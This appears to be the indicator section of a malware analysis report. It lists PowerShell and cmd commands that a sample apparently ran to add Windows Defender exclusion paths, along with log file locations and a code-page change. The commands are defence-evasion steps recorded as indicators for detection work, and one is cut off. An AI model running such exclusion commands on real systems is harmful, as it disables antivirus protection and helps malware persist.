Technical Information
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\Dllhost"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\HostData"
- %ALLUSERSPROFILE%\hostdata\logs.uce
- %TEMP%\logs.uce
- C:\logs.uce
- %ALLUSERSPROFILE%\hostdata\logs.uce
- '%WINDIR%\syswow64\cmd.exe' /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "%ALLUSERSPROFILE%\Dllhost" & powershell -Com...
- '%WINDIR%\syswow64\chcp.com' 1251